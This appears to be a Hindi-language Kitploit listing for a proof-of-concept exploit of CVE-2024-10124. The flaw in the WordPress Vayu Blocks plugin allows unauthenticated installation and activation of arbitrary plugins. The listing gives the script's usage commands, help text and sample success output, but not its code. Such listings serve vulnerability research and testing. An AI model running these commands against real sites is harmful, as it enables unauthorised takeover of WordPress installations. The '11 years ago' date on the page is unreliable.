Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10124-Poc — WordPress Vayu Blocks प्लगइन में CVE-2024-10124 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो अनधिकृत प्लगइन इंस्टॉलेशन और सक्रियण की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन प्राप्त किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-10124-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-10124-poc

CVE-2024-10124-Poc

WordPress Vayu Blocks प्लगइन में CVE-2024-10124 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो अनधिकृत प्लगइन इंस्टॉलेशन और सक्रियण की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन प्राप्त किया जा सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-10124-Poc

WordPress के लिए Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce प्लगइन, tp_install() फ़ंक्शन में क्षमता जाँच (capability check) की कमी के कारण, 1.1.1 तक के सभी संस्करणों (1.1.1 सहित) में अनधिकृत रूप से मनमाने प्लगइन की स्थापना और सक्रियण के प्रति भेद्य है। यह अप्रमाणित हमलावरों के लिए मनमाने प्लगइन स्थापित करना और सक्रिय करना संभव बनाता है, जिसका उपयोग दूरस्थ कोड निष्पादन (remote code execution) प्राप्त करने के लिए किया जा सकता है, यदि कोई अन्य भेद्य प्लगइन स्थापित और सक्रिय हो। यह भेद्यता संस्करण 1.1.1 में आंशिक रूप से पैच की गई थी।

उदाहरण परिदृश्य

भेद्यता जाँचें

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

यह यह निर्धारित करने के लिए vayu-blocks प्लगइन के संस्करण की जाँच करेगा कि साइट भेद्य है या नहीं।

प्लगइन स्थापित करें (डिफ़ॉल्ट)

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

यह डिफ़ॉल्ट प्लगइन hello-dolly स्थापित करेगा

विशिष्ट प्लगइन स्थापित करें

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

यह लक्षित साइट पर plugin_name प्लगइन स्थापित करेगा।

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version

आउटपुट

root@kitploit:~
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

नोट:

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। इस स्क्रिप्ट के दुरुपयोग से होने वाली किसी भी क्षति के लिए लेखक जिम्मेदार नहीं है।

टूल डाउनलोड करें
🔍कमांडविवरणउदाहरण
🌐-u या --urlवर्डप्रेस साइट के लिए लक्षित URL निर्दिष्ट करें।-u http://192.168.100.74/wordpress
🔒--check-versionजाँचें कि क्या साइट संस्करण के आधार पर भेद्य है।-u http://192.168.100.74/wordpress --check-version
⚙️-p या --pluginप्लगइन का नाम निर्दिष्ट करें (डिफ़ॉल्ट hello-dolly है)।-u http://192.168.100.74/wordpress -p plugin_name